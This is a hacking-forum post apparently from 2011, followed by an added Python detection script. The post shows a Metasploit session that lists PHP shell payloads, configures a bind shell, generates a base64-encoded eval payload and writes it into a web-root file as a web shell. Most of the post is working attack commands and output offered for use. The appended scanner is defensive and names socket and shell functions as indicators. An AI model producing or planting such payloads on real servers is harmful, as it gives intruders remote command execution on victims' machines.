Subject: Metasploit PHP Shell
02-12-2011, 09:15 PM   Post number: 1 (permalink)
Member information
data$hack
 



HI EVERYONE
LIKE THE TITLE SAID

Code:



                                  _
                                 | |      o
 _  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                           /|
                           \|


       =[  Metasploit  v3.5.2-beta [core:3.5 api:1.0]
+ -- --=[ 644 exploits - 328 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
       =[ svn r11722 updated 4 days ago (2011.02.08)

msf > search php
[*] Searching loaded modules for pattern 'php'...

<--BIG SNIP-->

NOP Generators
==============

   Name         Disclosure Date  Rank    Description
   ----         ---------------  ----    -----------
   php/generic                   normal  PHP Nop Generator


Payloads
========

   Name                         Disclosure Date  Rank    Description
   ----                         ---------------  ----    -----------
   php/bind_perl                                 normal  PHP Command Shell, Bind TCP (via perl)
   php/bind_php                                  normal  PHP Command Shell, Bind TCP (via php)
   php/download_exec                             normal  PHP Executable Download and Execute
   php/exec                                      normal  PHP Execute Command 
   php/meterpreter/bind_tcp                      normal  PHP Meterpreter, Bind TCP Stager
   php/meterpreter/reverse_tcp                   normal  PHP Meterpreter, PHP Reverse TCP stager
   php/meterpreter_reverse_tcp                   normal  PHP Meterpreter, Reverse TCP Inline
   php/reverse_perl                              normal  PHP Command, Double reverse TCP connection (via perl)
   php/reverse_php                               normal  PHP Command Shell, Reverse TCP (via php)
   php/shell_findsock                            normal  PHP Command Shell, Find Sock

msf > use php/bind_php
msf payload(bind_php) > show options

Module options (payload/php/bind_php):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST                   no        The target address

msf payload(bind_php) > set RHOST 192.168.1.5
RHOST => 192.168.1.5
msf payload(bind_php) > set LPORT 4321
LPORT => 4321
msf payload(bind_php) > generate -h
Usage: generate [options]

Generates a payload.

OPTIONS:

    -E        Force encoding.
    -b <opt>  The list of characters to avoid: '\x00\xff'
    -e <opt>  The name of the encoder module to use.
    -f <opt>  The output file name (otherwise stdout)
    -h        Help banner.
    -i <opt>  the number of encoding iterations.
    -k        Keep the template executable functional
    -o <opt>  A comma separated list of options in VAR=VAL format.
    -p <opt>  The Platform for output.
    -s <opt>  NOP sled length.
    -t <opt>  The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
    -x <opt>  The executable template to use

msf payload(bind_php) > generate -t raw -e php/base64
eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));<--BIG SNIP-->

msf payload(bind_php) > exit



root@pentest101-desktop:/var/www# echo '<?php eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK)); ?>' > bind.php



#pentest101.blogspot.com
Code:
http://pastebin.com/5G1sH1x9




Signature


data$hack : EIP HUNTER


Ninja-security team
http://Pentest101.blogspot.com

 

   

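A defender-side check for the artifact the transcript above leaves in a web root, a PHP file whose body is `eval(base64_decode(...))`. This is an added example, not part of the original post: it finds the wrapper, decodes the blob even when it is truncated or unpadded, and flags runtime calls that a long-lived listening shell depends on. The indicator list, the function names and the sample strings are assumptions constructed for illustration.

```python
import base64
import binascii
import re

# eval(base64_decode(<blob>)), blob quoted or bare (it is bare in the transcript above).
WRAPPER = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]?([A-Za-z0-9+/=\s]{16,})['\"]?\s*\)\s*\)",
    re.IGNORECASE,
)

# Assumed indicator list for this example: runtime calls a long-lived
# listening shell depends on. Extend it for your own environment.
INDICATORS = ("set_time_limit(0)", "ignore_user_abort", "socket_create",
              "socket_bind", "socket_listen", "stream_socket_server",
              "proc_open", "shell_exec", "passthru")


def decode_blob(blob):
    """Decode base64 that may be truncated or unpadded; None if undecodable."""
    blob = re.sub(r"[\s=]", "", blob)
    if len(blob) % 4 == 1:            # a lone trailing character encodes nothing
        blob = blob[:-1]
    blob += "=" * (-len(blob) % 4)    # restore padding lost to truncation
    try:
        return base64.b64decode(blob).decode("latin-1")
    except (binascii.Error, ValueError):
        return None


def scan_php(source):
    """Return one finding per eval(base64_decode(...)) wrapper in source."""
    findings = []
    for m in WRAPPER.finditer(source):
        decoded = (decode_blob(m.group(1)) or "").lower()
        hits = sorted(i for i in INDICATORS if i in decoded)
        findings.append({
            "line": source.count("\n", 0, m.start()) + 1,
            "indicators": hits,
            "severity": "high" if hits else "review",
        })
    return findings


# Constructed, inert sample: the encoded body only sets runtime flags and echoes.
_BODY = b"@set_time_limit(0); @ignore_user_abort(1); echo 'constructed sample';"
SAMPLE_B64 = base64.b64encode(_BODY).decode()
SAMPLE_DROPPER = "<?php\n// constructed sample\neval(base64_decode(" + SAMPLE_B64 + ")); ?>"

if __name__ == "__main__":
    for finding in scan_php(SAMPLE_DROPPER):
        print(finding)
```

A wrapper whose decoded body matches no indicator is still reported with severity `review`, since legitimate application code rarely needs to `eval` a base64 string.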